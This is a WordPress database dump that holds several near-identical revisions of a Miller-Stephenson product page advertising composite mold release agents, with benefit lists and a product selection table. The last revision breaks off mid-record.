INSERT INTO `wp_posts` VALUES (2948, 3, '2016-11-08 20:24:30', '2016-11-08 20:24:30', 'Miller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite mold material in the industry. Our formulations are uniquely tailored to yield  These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistant and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:\r\n<ul>\r\n 	<li>Low or No volatile organic compounds (VOC)</li>\r\n 	<li>Minimal odor; 100% non-flammable formulations</li>\r\n 	<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\r\n 	<li>Higher productivity; Increased cost-effectiveness</li>\r\n 	<li>Low rejection rate; Consistent part quality</li>\r\n</ul>\r\nMiller-Stephenson composite mold release agents have been optimized to cover industry applications from Fiber Reinforced Plastic (FRP) to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:\r\n<ul>\r\n 	<li>Thermoset Epoxies, phenolics, and BMIs</li>\r\n 	<li>Thermoset Prepregs</li>\r\n 	<li>Potting and Casting Resins</li>\r\n 	<li>Hand lay-ups</li>\r\n 	<li>Filament Winding</li>\r\n 	<li>Autoclave molding</li>\r\n 	<li>Vacuum bag molding</li>\r\n 	<li>Resin transfer molding</li>\r\n 	<li>Resin film infusion</li>\r\n 	<li>Compression, Transfer, Injection Molding</li>\r\n 	<li>Rotational Molding</li>\r\n 	<li>Metallic, Cermaic, and Composite Tooling</li>\r\n</ul>\r\n<h3>Advantages of Utilizing Miller-Stephenson Composite Mold Release Agents</h3>\r\nMiller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their composite molding operations. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys semi-permanents mold release agents</a> and<a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/"> PTFE Dry Film release agents</a>, along with our industry leading support network, brings significant operational benefits.\r\n<ul>\r\n 	<li>Water-based options for reducing environmental impact and improving facility HSE</li>\r\n 	<li>Flexibility to accommodate a wide range of process conditions</li>\r\n 	<li>A global network of support experts to work with you to eliminate bottlenecks and improve process flow</li>\r\n 	<li>Cost-effective, high durability, and consistent mold release</li>\r\n 	<li>Reduced downtime and scrap rates</li>\r\n 	<li>Minimal mold fouling and transfer</li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;">Release Agent Selection Guide</span></h2>\r\n<table width="751">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Product Type</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Application</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Finish</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="151">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Product</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="203">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Description</span></strong></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="font-size: 110%;">ReleaSys 8500</span></a></strong></td>\r\n<td style="text-align: center;">Medium  Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122">Solvent /PTFE Dry Film</td>\r\n<td style="text-align: center;" rowspan="4" width="122">Resin Potting and Casting</td>\r\n<td style="text-align: center;" rowspan="4">Matte-Dry</td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;"><strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong> or <strong><a href="https://www.miller-stephenson.com/product/ptfe-mold-release-agents/">MS-143TE</a></strong></span></td>\r\n<td style="text-align: center;">PTFE Dry Film</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal Rejection Rate</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3">High Slip</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="font-size: 110%;">ReleaSys 8800</span></a></strong></td>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability; High Slip</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Filament Winding</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">High Performance Composites</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;', 'Composite Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2936-revision-v1', '', '', '2016-11-08 20:24:30', '2016-11-08 20:24:30', '', 2936, 'https://www.miller-stephenson.com/2936-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2949, 3, '2016-11-08 20:47:07', '2016-11-08 20:47:07', 'Miller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite material in the industry. Our formulations are uniquely tailored to yield  These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistant and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:\r\n<ul>\r\n 	<li>Low or No volatile organic compounds (VOC)</li>\r\n 	<li>Minimal odor; 100% non-flammable formulations</li>\r\n 	<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\r\n 	<li>Higher productivity; Increased cost-effectiveness</li>\r\n 	<li>Low rejection rate; Consistent part quality</li>\r\n</ul>\r\nMiller-Stephenson composite mold release agents have been optimized to cover industry applications from Fiber Reinforced Plastic (FRP) to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:\r\n<ul>\r\n 	<li>Thermoset Epoxies, phenolics, and BMIs</li>\r\n 	<li>Thermoset Prepregs</li>\r\n 	<li>Potting and Casting Resins</li>\r\n 	<li>Hand lay-ups</li>\r\n 	<li>Filament Winding</li>\r\n 	<li>Autoclave molding</li>\r\n 	<li>Vacuum bag molding</li>\r\n 	<li>Resin transfer molding</li>\r\n 	<li>Resin film infusion</li>\r\n 	<li>Compression, Transfer, Injection Molding</li>\r\n 	<li>Rotational Molding</li>\r\n 	<li>Metallic, Cermaic, and Composite Tooling</li>\r\n</ul>\r\n<h3>Advantages of Utilizing Miller-Stephenson Composite Mold Release Agents</h3>\r\nMiller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their composite molding operations. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys semi-permanents mold release agents</a> and<a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/"> PTFE Dry Film release agents</a>, along with our industry leading support network, brings significant operational benefits.\r\n<ul>\r\n 	<li>Water-based options for reducing environmental impact and improving facility HSE</li>\r\n 	<li>Flexibility to accommodate a wide range of process conditions</li>\r\n 	<li>A global network of support experts to work with you to eliminate bottlenecks and improve process flow</li>\r\n 	<li>Cost-effective, high durability, and consistent mold release</li>\r\n 	<li>Reduced downtime and scrap rates</li>\r\n 	<li>Minimal mold fouling and transfer</li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;">Release Agent Selection Guide</span></h2>\r\n<table width="751">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Product Type</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Application</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Finish</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="151">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Product</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="203">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Description</span></strong></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="font-size: 110%;">ReleaSys 8500</span></a></strong></td>\r\n<td style="text-align: center;">Medium  Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122">Solvent /PTFE Dry Film</td>\r\n<td style="text-align: center;" rowspan="4" width="122">Resin Potting and Casting</td>\r\n<td style="text-align: center;" rowspan="4">Matte-Dry</td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;"><strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong> or <strong><a href="https://www.miller-stephenson.com/product/ptfe-mold-release-agents/">MS-143TE</a></strong></span></td>\r\n<td style="text-align: center;">PTFE Dry Film</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal Rejection Rate</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3">High Slip</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="font-size: 110%;">ReleaSys 8800</span></a></strong></td>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability; High Slip</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Filament Winding</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">High Performance Composites</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;', 'Composite Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2936-revision-v1', '', '', '2016-11-08 20:47:07', '2016-11-08 20:47:07', '', 2936, 'https://www.miller-stephenson.com/2936-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2950, 3, '2016-11-08 20:48:10', '2016-11-08 20:48:10', 'Miller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite material in the industry. Our formulations are uniquely tailored to yield  These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistant and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:\r\n<ul>\r\n 	<li>Low or No volatile organic compounds (VOC)</li>\r\n 	<li>Minimal odor; 100% non-flammable formulations</li>\r\n 	<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\r\n 	<li>Higher productivity; Increased cost-effectiveness</li>\r\n 	<li>Low rejection rate; Consistent part quality</li>\r\n</ul>\r\nMiller-Stephenson composite mold release agents have been optimized to cover industry applications from Fiber Reinforced Plastic (FRP) to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:\r\n<ul>\r\n 	<li>Thermoset Epoxies, phenolics, and BMIs</li>\r\n 	<li>Thermoset Prepregs</li>\r\n 	<li>Potting and Casting Resins</li>\r\n 	<li>Hand lay-ups</li>\r\n 	<li>Filament Winding</li>\r\n 	<li>Autoclave molding</li>\r\n 	<li>Vacuum bag molding</li>\r\n 	<li>Resin transfer molding</li>\r\n 	<li>Resin film infusion</li>\r\n 	<li>Compression, Transfer, Injection Molding</li>\r\n 	<li>Rotational Molding</li>\r\n 	<li>Metallic, Cermaic, and Composite Tooling</li>\r\n</ul>\r\n<h3>Advantages of Utilizing Miller-Stephenson Composite Mold Release Agents</h3>\r\nMiller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their composite molding operations. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys semi-permanents mold release agents</a> and<a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/"> PTFE Dry Film release agents</a>, along with our industry leading support network, brings significant operational benefits.\r\n<ul>\r\n 	<li>Water-based options for reducing environmental impact and improving facility HSE</li>\r\n 	<li>Flexibility to accommodate a wide range of process conditions</li>\r\n 	<li>A global network of support experts to work with you to eliminate bottlenecks and improve process flow</li>\r\n 	<li>Cost-effective, high durability, and consistent mold release</li>\r\n 	<li>Reduced downtime and scrap rates</li>\r\n 	<li>Minimal mold fouling and transfer</li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;">Release Agent Selection Guide</span></h2>\r\n<table width="751">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Product Type</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Application</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Finish</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="151">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Product</span></strong></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="203">\r\n<h3><span style="color: #0000ff;" data-text-color="primary"><strong><span style="font-size: 100%;">Description</span></strong></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="font-size: 110%;">ReleaSys 8500</span></a></strong></td>\r\n<td style="text-align: center;">Medium  Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122">Solvent /PTFE Dry Film</td>\r\n<td style="text-align: center;" rowspan="4" width="122">Resin Potting and Casting</td>\r\n<td style="text-align: center;" rowspan="4">Matte-Dry</td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;"><strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong> or <strong><a href="https://www.miller-stephenson.com/product/ptfe-mold-release-agents/">MS-143TE</a></strong></span></td>\r\n<td style="text-align: center;">PTFE Dry Film</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal Rejection Rate</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3">High Slip</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="font-size: 110%;">ReleaSys 8800</span></a></strong></td>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability; High Slip</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Filament Winding</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">High Performance Composites</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;', 'Composite Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2936-revision-v1', '', '', '2016-11-08 20:48:10', '2016-11-08 20:48:10', '', 2936, 'https://www.miller-stephenson.com/2936-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2951, 3, '2016-11-08 20:53:05', '2016-11-08 20:53:05', 'Miller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite material in the industry. Our formulations are uniquely tailored to yield  These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistant and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:\r\n<ul>\r\n 	<li>Low or No volatile organic compounds (VOC)</li>\r\n 	<li>Minimal odor; 100% Non-flammable formulations</li>\r\n 	<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\r\n 	<li>Higher productivity; Increased cost-effectiveness</li>\r\n 	<li>Low rejection rate; Consistent part 